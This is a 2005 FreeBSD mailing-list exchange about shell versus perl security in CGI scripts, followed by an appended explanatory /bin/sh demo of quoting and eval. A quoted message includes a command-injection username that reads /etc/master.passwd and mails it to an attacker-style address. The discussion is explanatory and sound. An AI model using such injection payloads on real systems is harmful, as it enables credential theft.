Date:      Fri, 4 Feb 2005 22:19:18 -0800
From:      "Loren M. Lang" <lorenl@alzatex.com>
To:        Dan Nelson <dnelson@allantgroup.com>
Cc:        freebsd-questions@freebsd.org
Subject:   Re: perl and ports
Message-ID:  <20050205061918.GG8619@alzatex.com>
In-Reply-To: <20050205041344.GK25463@dan.emsphone.com>
References:  <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <ef60af0905012500265eb38b66@mail.gmail.com> <EB3282A396FFCC78382D2E81@utd49554.utdallas.edu> <ef60af090501251100472d6fb6@mail.gmail.com> <20050125194736.GD76109@xor.obsecurity.org> <ef60af09050125142353301be4@mail.gmail.com> <ef60af09050125144166ecaae4@mail.gmail.com> <20050205034440.GF8619@alzatex.com> <20050205041344.GK25463@dan.emsphone.com>

On Fri, Feb 04, 2005 at 10:13:45PM -0600, Dan Nelson wrote:
> In the last episode (Feb 04), Loren M. Lang said:
> > Actually, I think you should work on sh first, it's a much bigger
> > security hazard than perl.  If you've ever written much sh, you'd
> > realize with its much looser syntax, it's easy to get into trouble.
> > At least perl provides use strict and -Tw.  Someone using sh to write
> > cgi scripts is the worst.  Imagine someone writing the following line
> > for a sh cgi script where $USERNAME is a cgi parameter passed into
> > the following script:
> > 
> > echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
> > 
> > What if someone wrote the following username and apache was running as
> > root:
> > 
> > charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo
> 
> Then you would get a web page containing:
> 
> <HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo</TITLE></HEAD>
> 
> .  The shell doesn't re-interpret its input unless explicitly told to
> via the "eval" command.  /bin/sh is a little limited for more complex
> scripts due to its lack of arrays, though, so zsh/ksh/bash are much
> better choices :)

Well, my email was meant as a joke and I didn't bother to validate anything
I wrote, I just remember reading something along these lines in a cgi book
warning of the dangers of sh scripting for cgi scripts.  The original
example was more elaborate and probably did use eval, but my point is
that sh can be more dangerous than perl since it uses a looser syntax.
By not using "'s around $USERNAME, it will end up being parsed as
multiple arguments which, for echo, isn't a big deal, but for most
commands you can end up shooting yourself in the foot.  I definitely would
not recommend removing it from the system or even recommend against using
it for anything, but just pointing at the irony of considering perl a
giant security hole.

Mostly, I have just found this whole thread very humorous, and I wonder
what the reaction of the developers will be when he tries asking them to
stop using perl.

> 
> -- 
> 	Dan Nelson
> 	dnelson@allantgroup.com

-- 
I sense much NT in you.
NT leads to Bluescreen.
Bluescreen leads to downtime.
Downtime leads to suffering.
NT is the path to the darkside.
Powerful Unix is.

Public Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc
Fingerprint: B3B9 D669 69C9 09EC 1BCD  835A FAF3 7A46 E4A3 280C
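As an added example (not code from either poster), here is a small /bin/sh script that checks the behaviour both messages describe: an unquoted `$USERNAME` is word-split into several arguments but its `;` is never re-parsed, a quoted one is a single argument, and only `eval` re-interprets the string as commands. `USERNAME` is a constructed stand-in for the cgi parameter, and `is_safe_username` is a hypothetical validation helper.

```shell
#!/bin/sh
# Constructed stand-in for the $USERNAME cgi parameter from the thread.
# The payload after ';' is benign on purpose (it only echoes a marker).
USERNAME='charlie; echo INJECTED'

# Report how many separate arguments a command actually received.
count_args() {
    echo "$#"
}

# 1. Unquoted expansion: the shell word-splits the value on whitespace
#    but does not re-parse ';' as a command separator, so nothing runs;
#    the command just sees three arguments instead of one.
unquoted_argc() {
    count_args $USERNAME   # deliberately unquoted
}

# 2. Quoted expansion: exactly one argument, metacharacters still inert.
quoted_argc() {
    count_args "$USERNAME"
}

# 3. eval: the text is handed back to the parser as shell source, so ';'
#    now terminates the echo and the remainder executes as a command.
#    This is the only case in which the input is re-interpreted.
eval_result() {
    eval "echo Welcome, $USERNAME"
}

# Hypothetical allow-list check: accept only a conservative character
# class so a value can never carry shell syntax into eval or a command
# line.  Returns 0 for an acceptable value, 1 otherwise.
is_safe_username() {
    case "$1" in
        "")                return 1 ;;
        *[!A-Za-z0-9_.-]*) return 1 ;;
        *)                 return 0 ;;
    esac
}
```

Run the three functions side by side to see the argument counts and the eval output differ; the allow-list rejects the constructed value while accepting plain names.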
 


